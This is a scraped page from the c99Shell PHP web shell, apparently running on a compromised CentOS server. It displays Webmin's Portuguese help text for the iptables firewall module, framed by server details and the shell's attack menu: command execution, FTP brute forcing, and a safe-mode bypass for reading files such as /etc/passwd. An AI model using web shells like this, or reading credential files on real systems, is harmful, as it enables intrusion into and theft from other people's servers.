!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/firewall/help/   drwxr-xr-x
Free 53.69 GB of 127.8 GB (42.01%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     intro.pt_BR.html (3.74 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
Firewall Linux

Introdução ao Módulo

Este módulo lhe permite configurar as características do firewall IPtables encontradas na série 2.4 do kernel do Linux. Diferente de alguns outros programas para configuração de firewall, ao invés de criar um shell script para configurar o firewall, ele lê e edita um arquivo salvo no formato de leitura e escrita do iptables-restore e iptables-save respectivamente.

Se você já possui um firewall em seu sistema que foi configurado manualmente ou a partir de um script, o módulo oferecerá para convertê-lo para um arquivo salvo no formato do IPtables, e criar um script que poderá ser executado durante a inicialização para a ativação das regras contidas no arquivo. Entretanto, se você fizer isso, você não deverá editar mais o script com as regras do firewall e deverá desabilitar sua execução durante a inicialização do sistema.

Visão geral sobre IPtables

Todo pacote de rede que vem para dentro, sai ou é redirecionado pelo seu sistema é checado em cada chain para determinar o que acontecerá com ele. Cada chain contém zero ou mais regras, que possuem condições (para determinar quais pacotes coincidem com ela) e uma ação (para controlar o que acontece com os pacotes que coincidem com ela). Cada chain possui também uma ação padrão que controla o que acontece com os pacotes que não coincidem com nenhuma regra.

Cada chain é parte de uma tabela, que atualmente são três:

  • Filtragem de Pacotes (filter)
    As chains nesta tabela podem ser utilizadas para controlas os dados que entram em seu sistema a partir de outros hosts na rede, dados enviados a partir do seu sistema por usuários e processos, e dados redirecionados pelo seu sistema se sua ação é como um roteador.

  • Tradução de endereço de rede (nat)
    Esta tabela pode ser utilizada para configurar NAT ou mascaramento, que são úteis se você quer dar acesso à internet a máquinas que estão na rede interna através de somente um IP real.

  • Alteração de Pacotes (mangle)
    Esta chain é para modificar pacotes redirecionados ou enviados pelo seu sistema.

Em adição às chains padrão que são parte de cada tabela, você também pode criar suas próprias chains que poderão ser executadas pela regras das chains padrão. Isto pode ser útil para agrupar e compartilhar regras que poderão ser utilizadas em múltiplos lugares.

A página principal

A página principal deste módulo lista todas as chains e regras de uma das tabelas disponíveis, selecionada a partir da lista no topo-esquerdo. Abaixo segue uma seção para cada chain da tabela atual, com todas a regras em cada chain listada e suas respectivas descrições. Para cada chain, você pode alterar a ação padrão utilizando o combobox, se a chain é uma chain padrão, ou apagá-la com o botão Apagar Chain se ela foi definida pelo usuário.

Você pode clicar em qualquer regra em uma chain para editá-la, clicar nas setas da direita de cada linha para movê-la para cima ou para baixo, ou clicar no botão Adicionar Regra para adicionar uma nova regra.Adicionando ou editando uma regra, você será levado para uma página na qual você poderá selecionar a ação para cada regra, e as condições para as quais a ação será executada.

Na parte de baixo da página está um botão para tornar a configuração atual do firewall ativa, carregando-a através do comando iptables-restore. A seguir está um botão para fazer o inverso - pegar a configuração que está corrente no kernel e torná-la disponível para edição. Finalmente, se sua distribuição suportar, existe um botão para indicar se o firewall será ativado durante o boot ou não.



:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0047 ]--